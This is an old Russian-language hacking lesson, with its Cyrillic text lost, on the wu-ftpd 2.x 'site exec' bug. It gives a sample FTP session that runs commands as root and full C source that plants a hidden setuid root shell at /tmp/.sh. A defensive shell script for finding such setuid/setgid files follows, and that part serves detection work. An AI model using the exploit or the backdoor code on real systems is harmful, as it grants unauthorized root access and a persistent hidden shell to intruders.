| | UKA.ru | Gossip.ru | ! | massovka | vaticancitystate.ru | From 24.11.97
Lesson 021
----------

: exploit wu-ftp 2.x (site exec bug).

 account     wu-ftpd
    :
	cc -o ftpbug ftpbug.c

  :

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. 
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id"      (   sys )
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200  (end of 'bash -c id')
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200  (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.

   suid root shell  /tmp/.sh

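#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
   /* SITE EXEC ran the command with real uid 0 (see the id output above),
      so the effective uid can be switched back to root. */
   seteuid(0);
   /* Copy the shell and make the copy setuid/setgid, mode 6777. */
   system("cp /bin/sh /tmp/.sh");
   system("chmod 6777 /tmp/.sh");
   return 0;
}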

PS. Thanx to StaTiC
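
A defender's check for the artifact this lesson leaves behind (a setuid/setgid copy of the shell, mode 6777, in /tmp), as an added example that is not part of the original lesson: it lists setuid/setgid files under directories where none should exist and ranks each one. The function names and the CRITICAL/REVIEW labels are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the original lesson): find setuid/setgid files in
# directories that should never hold them, e.g.  sh audit.sh /tmp /var/tmp /home
# Function names and severity labels are illustrative assumptions.

# find_setid DIR... : print every regular file with the setuid or setgid bit.
find_setid() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -xdev stays on one filesystem; -4000 is setuid, -2000 is setgid
        find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    done
}

# classify FILE : print CRITICAL for a root-owned setuid file or any
# world-writable set-id file (the /tmp/.sh case matches both), else REVIEW.
classify() {
    # ls -ldn prints: mode-string links uid gid ...; only fields 1 and 3 are used
    set -- $(ls -ldn -- "$1")
    mode=$1
    uid=$3
    sev=REVIEW
    case "$mode" in
        ???[sS]*) if [ "$uid" = 0 ]; then sev=CRITICAL; fi ;;  # setuid + owner root
    esac
    case "$mode" in
        ????????w*) sev=CRITICAL ;;                            # writable by anyone
    esac
    printf '%s\n' "$sev"
}

# audit DIR... : one "SEVERITY path" line per finding.
audit() {
    find_setid "$@" | while IFS= read -r f; do
        printf '%s %s\n' "$(classify "$f")" "$f"
    done
}

# Run only when directories are given on the command line.
if [ "$#" -gt 0 ]; then
    audit "$@"
fi
```

Mounting /tmp and home filesystems with nosuid makes such a file inert even if it is created, and the scan then serves as a record that something tried.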
